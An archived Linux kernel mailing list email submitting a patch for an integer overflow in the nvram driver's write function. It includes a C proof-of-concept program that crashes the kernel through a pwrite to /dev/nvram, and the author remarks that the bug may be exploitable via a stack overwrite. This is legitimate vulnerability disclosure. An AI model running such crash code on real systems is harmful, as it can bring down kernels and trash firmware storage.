From: Michael Buesch <mb@bu3sch.de>
To: linux-kernel@vger.kernel.org
Subject: [PATCH] nvram: Fix root triggerable integer overflow crash
Date: Sat, 18 Jul 2009 02:56:45 +0200 [thread overview]
Message-ID: <200907180256.45934.mb@bu3sch.de> (raw)
The following patch fixes a root triggerable integer overflow based kernel crash.
The nvram_write() file operation subtracts the loff_t file offset from NVRAM_BYTES
without checks. This might result in an overflow of the integer. That value
is used for bounds checking of the "count", which is the buffer size to be copied
from userspace to the kernel stack.
So root can render the "count" check useless by overflowing the loff_t offset (which is "i").
copy_from_user() will then copy arbitrary amounts of memory to the kernel stack.
The userspace program to crash the kernel is as follows:
(Be careful when running the testcase. It might trash your NVRAM)
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define NVRAM_BYTES 128
int main(void)
{
ssize_t res;
int fd;
char *buf;
unsigned int bufsize;
fd = open("/dev/nvram", O_RDWR);
if (fd < 0) {
printf("Could not open nvram device\n");
return 1;
}
bufsize = NVRAM_BYTES + 100;
buf = malloc(bufsize);
if (!buf) {
printf("Out of memory\n");
return 1;
}
memset(buf, 0, bufsize);
res = pwrite(fd, buf, bufsize, NVRAM_BYTES + 1);
if (res == bufsize)
printf("NVRAM write succeed\n");
else
printf("NVRAM write failed\n");
}
Signed-off-by: Michael Buesch <mb@bu3sch.de>
---
This bug probably is exploitable by overwriting the function return address or something
like that. But let's hope there's no distribution out there with user write permissions
on the /dev/nvram node. So it's probably only exploitable by root.
Comments on the exploitability are welcome. :)
Index: linux-2.6.30/drivers/char/nvram.c
===================================================================
--- linux-2.6.30.orig/drivers/char/nvram.c 2009-07-18 01:29:50.000000000 +0200
+++ linux-2.6.30/drivers/char/nvram.c 2009-07-18 02:47:35.000000000 +0200
@@ -267,6 +267,8 @@
unsigned char *tmp;
int len;
+ if (i >= NVRAM_BYTES)
+ return -EINVAL;
len = (NVRAM_BYTES - i) < count ? (NVRAM_BYTES - i) : count;
if (copy_from_user(contents, buf, len))
return -EFAULT;
--
Greetings, Michael.
next reply other threads:[~2009-07-18 0:57 UTC|newest]
Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top
2009-07-18 0:56 Michael Buesch [this message]
2009-07-18 15:09 ` [PATCH] nvram: Fix root triggerable integer overflow crash Henrique de Moraes Holschuh
2009-07-18 17:44 ` Michael Buesch
2009-07-18 18:53 ` Henrique de Moraes Holschuh
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=200907180256.45934.mb@bu3sch.de \
--to=mb@bu3sch.de \
--cc=linux-kernel@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox